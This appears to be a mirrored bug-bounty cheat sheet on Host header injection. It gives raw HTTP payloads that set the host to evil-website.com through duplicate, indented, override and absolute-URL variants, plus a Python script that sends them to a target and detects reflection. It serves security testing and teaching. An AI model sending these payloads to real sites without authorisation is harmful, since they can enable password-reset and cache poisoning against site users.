Mirror of https://github.com/daffainfo/AllAboutBugBounty.git (synced 2024-12-18 10:26:11 +00:00)
Host Header Injection
- Change the Host header to an attacker-controlled value. If the response reflects it (in a Location header, an absolute link, or a password-reset URL), the application trusts the Host header.

```http
GET /index.php HTTP/1.1
Host: evil-website.com
...
```
- Duplicate the Host header. A front-end and a back-end server may disagree about which copy wins (the first or the last), so try both orders.

```http
GET /index.php HTTP/1.1
Host: vulnerable-website.com
Host: evil-website.com
...
```
- Add line wrapping. Indent one of the two Host headers with a leading space: some servers ignore the indented line entirely, others parse it as the real Host header, so the front-end and back-end can end up with different values.

```http
GET /index.php HTTP/1.1
 Host: evil-website.com
Host: vulnerable-website.com
...
```
- Add host override headers. Reverse proxies normally set these to pass along the original client IP or host; when the application trusts them, each one is a way to inject a value while keeping a valid Host header. X-Forwarded-Host is the one that normally carries a hostname; the others usually carry a client IP, but are worth trying as well.

```http
X-Forwarded-For: evil-website.com
X-Forwarded-Host: evil-website.com
X-Client-IP: evil-website.com
X-Remote-IP: evil-website.com
X-Remote-Addr: evil-website.com
X-Host: evil-website.com
```

Example using X-Forwarded-For (the real Host header stays in place so the request still reaches the target):

```http
GET /index.php HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For: evil-website.com
...
```
- Supply an absolute URL in the request line. Some servers give the request-line host priority over the Host header, so the two can be made to disagree.

```http
GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com
...
```
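The variants above, as an added example written for this page (not code from the AllAboutBugBounty repository or from PortSwigger): a Python script that builds every request as raw bytes, because ordinary HTTP client libraries normalize away duplicate, indented or absolute-URL Host framing, and then checks a response for the injected host in a Location header, another header, or the body. `vulnerable-website.com` and `evil-website.com` are the page's own placeholders; the `send_raw` helper and the sample 302 response are assumptions constructed here so the script runs offline.

```python
import socket
import ssl
from typing import Dict, List, Optional

TARGET = "vulnerable-website.com"  # placeholder used on this page
CANARY = "evil-website.com"        # attacker-controlled value from this page

OVERRIDE_HEADERS = (
    "X-Forwarded-For", "X-Forwarded-Host", "X-Client-IP",
    "X-Remote-IP", "X-Remote-Addr", "X-Host",
)


def build_requests(target: str, canary: str, path: str = "/index.php") -> Dict[str, bytes]:
    """Return one raw HTTP/1.1 request per technique on the page, keyed by name."""

    def req(request_line: str, headers: List[str]) -> bytes:
        # Raw CRLF framing; "Connection: close" lets send_raw read until EOF.
        lines = [request_line] + headers + ["Connection: close", "", ""]
        return "\r\n".join(lines).encode()

    variants = {
        # 1. replace the Host header outright
        "changed-host": req(f"GET {path} HTTP/1.1", [f"Host: {canary}"]),
        # 2. duplicate Host: front-end and back-end may pick different copies
        "duplicate-host": req(f"GET {path} HTTP/1.1",
                              [f"Host: {target}", f"Host: {canary}"]),
        # 3. line wrapping: the indented line is ignored by some parsers, honoured by others
        "wrapped-host": req(f"GET {path} HTTP/1.1",
                            [f" Host: {canary}", f"Host: {target}"]),
        # 4. absolute URL in the request line, disagreeing with the Host header
        "absolute-url": req(f"GET https://{target}{path} HTTP/1.1", [f"Host: {canary}"]),
    }
    # 5. override headers, each sent alongside a valid Host header
    for name in OVERRIDE_HEADERS:
        variants[f"override-{name.lower()}"] = req(
            f"GET {path} HTTP/1.1", [f"Host: {target}", f"{name}: {canary}"])
    return variants


def find_reflection(response: bytes, canary: str) -> Optional[str]:
    """Report where the canary is reflected: 'location', 'header', 'body', or None."""
    head, _, body = response.partition(b"\r\n\r\n")
    needle = canary.encode()
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(b":")
        if needle in value:
            return "location" if name.strip().lower() == b"location" else "header"
    if needle in body:
        return "body"
    return None


def send_raw(host: str, request: bytes, port: int = 443,
             use_tls: bool = True, timeout: float = 5.0) -> bytes:
    """Assumed helper: send the bytes untouched over a socket and read until EOF."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed sample: a redirect that rebuilt its Location from the injected host.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: https://evil-website.com/login\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for name, raw in build_requests(TARGET, CANARY).items():
        print(f"--- {name} ---")
        print(raw.decode())
    # Offline check against the constructed response; against a live target use
    # find_reflection(send_raw(TARGET, raw), CANARY) for each variant instead.
    print("reflected in:", find_reflection(SAMPLE_RESPONSE, CANARY))
```

Against a live target, run each variant through `send_raw` and keep the ones where `find_reflection` returns something; a hit in `location` or in a password-reset link in the body is the finding, a hit in an unrelated debug header usually is not.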
Source: https://portswigger.net/web-security/host-header/exploiting